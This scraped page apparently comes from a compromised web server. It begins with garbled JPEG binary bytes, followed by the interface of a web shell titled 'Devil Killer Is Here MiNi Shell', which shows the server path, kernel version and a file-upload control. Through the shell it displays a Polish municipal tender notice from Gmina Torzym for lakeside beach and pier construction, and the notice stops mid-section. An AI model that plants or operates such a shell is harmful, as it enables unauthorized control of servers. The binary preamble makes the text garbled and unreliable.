JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220321/0009298501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa plaż nad jeziorem „Ilno” w Torzymiu oraz nad jeziorem „Rzepinko” w Boczowie.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Torzym</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770439</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Torzym</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-235</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">68 341 6219</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@torzym.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.torzym.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa plaż nad jeziorem „Ilno” w Torzymiu oraz nad jeziorem „Rzepinko” w Boczowie.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-906abe61-a913-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00092985</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00011036/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa plaż nad jeziorem Ilno w Torzymiu oraz nad jeziorem Boczowskim w Boczowie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/torzym <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/torzym</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków <br/>o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie pzp., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/>2.	Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3.	Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.<br/>4.	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 pzp., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf.<br/>5.	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:<br/>a)	.zip <br/>b)	.7Z<br/>6.	UWAGA !!!<br/>Wśród rozszerzeń powszechnych a niewystępujących w Rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Torzym, z siedzibą <br/>w Torzymiu przy ul. Wojska Polskiego 32, 66-235 Torzym, z którą można kontaktować się pisemnie na adres siedziby lub poprzez adres e-mail: urzad@torzym.pl lub telefonicznie pod nr 68 341 6220.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@torzym.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres <br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu <br/>do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9) nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne <br/>z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, <br/>00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BGN.II.271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja robót budowlanych pn.: ,,Budowa plaż nad jeziorem „Ilno” w Torzymiu oraz nad jeziorem „Rzepinko” w Boczowie.”. Przedmiot zamówienia nazwany jest w dalszej części Instrukcji dla Wykonawców „obiektami” lub „przedmiotem zamówienia”.<br/>2. Zakres rzeczowy obejmuje:<br/>Zagospodarowanie sportowo-rekreacyjne nad Jeziorem „Ilno” w Torzymiu na działce ewid. 124/20 obręb Torzym<br/>2.2. PROJEKTOWANE ZAGOSPODAROWANIE DZIAŁKI<br/>W ramach zamierzenia inwestycyjnego pod nazwą: „wykonanie uporządkowania terenów zielonych polegających na usunięciu nieuporządkowanej zieleni w postaci zarośli, krzaków i trzciny oraz wykonaniu boiska do piłki plażowej, 2 wiat piknikowych, urządzeń siłowni zewnętrznej, wykonania ciągów pieszych, utwardzenia powierzchni terenu, montażu elementów małej architektury, miejsca do plażowania&#34; przewiduje się wykonanie następujących prac budowlano-montażowych:<br/>2.3. ZAKRES ROBÓT:<br/>• Boisko do piłki plażowej o wymiarach 8 x 16m o nawierzchni z piasku sortowanego powierzchnia 128 m2. z wyposażeniem w postaci słupków i siatki.<br/>• 2 wiaty w konstrukcji drewnianej, sześciokątne o średnicy 5 m z utwardzeniem powierzchniowym terenu pod nimi wykonanym z kostki betonowej, powierzchnia wiaty 16,24 m2, <br/>• Montaż elementów malej architektury:<br/>- Przebieralnia wykonana w konstrukcji drewnianej (nie zadaszona)- wymiary 1 ,32 m x 4,92 m <br/>- Ławki 4 szt. (z lokalizacja do ustalenia)<br/>- Stoły piknikowe 2 szt.<br/>- Stoły piknikowe pod wiatami szt. 2 – zakotwione na stałe do podłoża.<br/>- Stół do gry w szachy/warcaby, <br/>Urządzenia siłowni zewnętrznej:<br/>- orbitrek 1 szt.<br/>- wioślarz 1 szt.<br/>- biegacz 1 szt.<br/>- stojak na rowery, 5 stanowiskowy, do wkopania<br/>• Tablica informacyjna z regulaminem<br/>• Utwardzenie powierzchni terenu z kostki betonowej szerokości 5,5m, długości w osi 135,5m i powierzchni 753,5m2.<br/>• Utwardzenie powierzchni terenu z kostki betonowej szerokości 3,5 m, długości w osi 51,5m i powierzchni 192,5 m2<br/>• Utwardzenie powierzchni terenu z kostki betonowej o wymiarach 7x7m i powierzchni 49m2<br/> • Utwardzenie powierzchni terenu z kostki betonowej o szerokości 2,5m, długości w osi 27,5m i powierzchni 69 m2<br/>• Utwardzenie powierzchni terenu, wodoprzepuszczalne z tłucznia o powierzchni 287,5m2<br/>• Utwardzenie powierzchni terenu- schody terenowe z kostki betonowej<br/>• Utwardzenie powierzchni terenu z kostki betonowej szerokości 1,2m, długości 21,6 m <br/> i powierzchni 26,7m2 <br/>• Utwardzenie powierzchni terenu z piasku sortowanego na geowłókninie<br/>Elementy robót przedstawione na załączniku graficznym, wyłączone z zakresu robót: ( nr 2, nr 8, 9, 12, 13, 14)<br/>2.4. BOISKO DO PIŁKI PLAŻOWEJ<br/>Przed przystąpieniem do wykonania zasadniczych warstw nawierzchni należy wyrównać teren - podłoże powinno być jednorodne i uprzątnięte. Pod nawierzchnią z piasku płukanego należy zastosować geowłókninę separacyjno filtracyjną. Boisko ograniczyć obrzeżem PCV. Nawierzchnię wykonać z piasku płukanego, powierzchnia boiska o wymiarach 8x16m 128 m2, piasek płukany, bez zawartości części pylastych i iłów o frakcji od 1-3mm, grubość warstwy 40cm.<br/>Słupki do siatkówki systemowe o średnicy 12 cm.<br/>2.5. UTWARDZENIE POWIERZCHNI TERENU<br/>Przekrój utwardzenia powierzchni terenu z kostki betonowej o szerokości 5,5m, 3,5m, 2,5m:<br/>• Nawierzchnia z kostki brukowej grubości 8 cm (z betonu wibroprasowanego), kostka typu Holland, układana w rzędy<br/>• Podsypka cementowo-piaskowa(l grubości 5 cm<br/>• Podbudowa zasadnicza grubości 15 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym<br/>• Podbudowa pomocnicza grubości min.10 cm z gruntu stabilizowanego cementem o Rm = 5 MPa<br/>Utwardzenia powierzchni terenu z kostki betonowej zostaną ograniczone krawężnikiem typu lekkiego o wymiarach 15 x 30 cm z betonu wibroprasowanego na podsypce cementowo-piaskowej grubości 5 cm i ławie z oporem z betonu C12/15<br/>Przekrój konstrukcyjny utwardzenia powierzchni terenu z kostki betonowej o szerokości 1,2m i schodów terenowych:<br/>• Nawierzchnia z kostki brukowej grubości 6 cm (z betonu wibroprasowanego), kostka typu Holland układana w rzędy<br/>• Podsypka cementowo-piaskowa(1:3) grubości 5 cm<br/>Utwardzenia powierzchni terenu z kostki betonowej zostaną ograniczone opornikiem betonowym 8/30cm na ławie z oporem.<br/>W celu wykonania projektowanych utwardzeń powierzchni terenu należy zdjąć warstwę humusu, istniejące podłoże dogęścić, następnie wykonać warstwę wyrównującą z podbudowy pomocniczej z gruntu stabilizowanego cementem o Rm = 5 MPa<br/>Utwardzenie powierzchniowe terenu, wodoprzepuszczalne z tłucznia o powierzchni 287,5m2,<br/>Nawierzchnia z tłucznia układana będzie w 2 warstwach:<br/>• Kruszywo o frakcji 31,5 – 63 mm grubości 12cm (po zagęszczeniu)<br/>• Kruszywo łamane zwykłe o wielkości ziaren od 4 mm do 31,5 mm (po zagęszczeniu)<br/>Minimalna grubość warstwy nawierzchni tłuczniowej nie może być po zagęszczeniu mniejsza od 7 cm.<br/>2.6. WIATY<br/>Planuje się wykonać 2 wiaty.<br/>Wiaty wykonane i zamówione na budowę jako element gotowy:<br/>Wiaty piknikowe sześciokątne o średnicy 5m z posadzką wykonaną z kostki betonowej powierzchnia wiaty 15,9m2.<br/>Kotwienie wiat należy wykonać na stopach fundamentowych.<br/>Słupy nośne w rozmiarze 13 x 13 cm, wykonane ze specjalnego drewna klejonego, odpornego na powstawanie pęknięć i szczelin. Dodatkowo ryflowane słupy, szeroka deska okapowa oraz półokrągłe podpory wspierające dach. Wysokość słupów nośnych 2,2m, wysokość do kalenicy 2,9m. Wiata, pokryta zostanie gontem bitumicznym w kolorze grafitowym.<br/>Podłoże pod wiatą stanowić będzie utwardzenie powierzchni terenu z kostki betonowej - warstwy jak dla utwardzeń szerokości 1 ,2m <br/><br/>3. Zagospodarowanie sportowo-rekreacyjne nad Jeziorem „Rzepinko” w Boczowie na działce ewid. 251 oraz 239 i 184 obręb Boczów<br/><br/>3.1 Przedmiotem inwestycji jest „Budowa pomostu z elementami małej architektury przy plaży jeziora Rzepinko.”<br/>Planuje się budowę pomostu wraz z elementami małej architektury w celu umożliwienia powszechnego korzystania z wód i terenu przyległego do plaży przez mieszkańców i turystów przebywających nad jeziorem.<br/>Do zakresu wchodzi rozbiórka starego pomostu i budowa pomostu na palach drewnianych przy linii brzegowej jeziora.<br/>W ramach zadania przy plaży zamontowane zostaną trzy ławki z koszami na odpadki, stolik szachy+warcaby, stojak na 5 rowerów, dodatkowe dwie lampy parkowe (włączone do istniejącego słupa oświetleniowego o wystarczających parametrach elektroenergetycznych, trzy elementy siłowni zewnętrznej na pylonach: surfer/wahadło + jeździec, masażer bioder i pleców, narty biegówki/narciarz + wioślarz i trzy elementy placu zabaw dla dzieci: huśtawka podwójna, karuzela obrotowa, zjeżdżalnia z el. wspinaczkowym.<br/>Zagospodarowanie linii brzegowej praktycznie pozostanie bez zmian, tym bardziej iż w miejscu planowanej budowy pomostu w latach poprzednich funkcjonował już pomost o nieco mniejszych parametrach. W miejscu wejścia na pomost zostanie podniesiony (nawieziony i utwardzony) żwir o kilkadziesiąt centymetrów w celu wyrównania poziomu z istniejącą plażą w sąsiedztwie projektowanego pomostu.<br/>Podstawowe parametry pomostu:<br/>a)	pomost w kształcie litery „T” o długości 25,0m,<br/>b)	szerokość: na odcinku 21m — 2,5m, na odc. 4,0m - 25,0m<br/>c)	Powierzchnia pokładu pomostu — 152,5m2, d) Projektowana rzędna góry pokładu pomostu — 1,0m ponad max. poziom piętrzenia wód — wstępnie określa się - 75,9m n.p.m.,<br/>e)	wysokość pokładu pomostu ponad dnem jeziora — do 2,4m,<br/>f)	obarierowanie na całej długości o wysokości 110 cm,<br/>Słupy nośne — materiał modrzew o średnicy 28-30cm posadowione w gruncie na głębokość 2,5 do 5,0m i wystające ponad maksymalny poziom piętrzenia 0,7m nad lustro wody w jeziorze. Oczepy i legary (14x20 i 12x20) konstrukcji nośnej również wykonane z modrzewia europejskiego, gęstosłoistego impregnowanego dodatkowo ciśnieniowo, środkami o IV kategorii toksyczności (nieszkodliwe dla ryb i środowiska). Pokład pomostu również wykonany z deski modrzewiowej, konserwowanej ciśnieniowo o grubości 7cm i szerokości 14 cm — gładkiej — nie ryflowanej. Między deski pokładu a legary i między legary a oczepy należy zastosować dylatację z folii pvc o grubości min. 0,8mm j szerokości 0 2 — 4 cm szerszej od legarów i oczepów na których się znajdą stanowiąc dodatkową ochronę przed gniciem i butwieniem.<br/>Projektowany pomost, przeznaczony jest jako galeria rekreacyjno - widokowa. W rzucie stanowi on zabudowę jedno-osiową, z dwoma odnogami widokowymi. Konstrukcję nośną stanowi zespół pali fundamentowych zespolonych w odcinku głowicowym podciągami poprzecznymi i podłużnymi nośnymi. Usztywnienie poprzeczne stanowią rygle-oczepy pomostu usytuowane prostopadle do podciągów podłużnych - legarów.<br/>Pomost o nieograniczonym dostępie publiczności. Pomost zabezpieczony obustronnie drewnianą balustradą.<br/>3.2 POSADOWIENIE OBIEKTU:<br/>pomost posadowiony zostanie na 38 słupach modrzewiowych o średnicy 28-30 cm i długościach od 3,5 do 9,5m. Słupy posadowione w gruncie nośnym na głębokość 2,5 do 5,0m. Słupy zostaną zabite w dno po 3 sztuki w rzędzie pod pokładem i związane legarami i oczepami.<br/>3.3 OBSŁUGA KOMUNIKACYJNA:<br/>a)	lokalizacja wejścia/wyjścia: 1 przy plaży),<br/>b)	ilość osób/dobę: bez ograniczeń na pomoście,<br/>3.4 DYLATACJE:<br/>Na oczepy i legary jako dylatacja położona zostanie folia pvc o grubości pow. 0,8mm, zachodzić będzie na boki konstrukcji 2-3cm.<br/>3.5 NAWIERZCHNIA<br/>Zostanie również wykonana z modrzewia. Dylina pokładu przewidziana do montażu na całej powierzchni pokładu ma grubość 7cm i szerokość 14 cm. Deska pokładu przykręcana jest do legarów za pomocą wkrętów ze stali A2 8 x 140mm. Wkręty z łbem soczewkowym zagłębione poniżej powierzchni pokładu o min. 5mm.<br/>3.6 OBARIEROWANIE:<br/>Modrzewiowe, na całej długości za wyjątkiem wewnętrznej strony kąpieliska o wysokości 1, lm. Pochwyt 12 x 20 cm wyoblony powierzchniowo umożliwia spływ wody. Pochwyt zakonserwowany i malowany lazurą wodoodporną do drewna trzykrotnie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45243400-6 - Roboty w zakresie budowy plaż</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45242000-5 - Budowa infrastruktury wypoczynkowej na terenach nadwodnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) 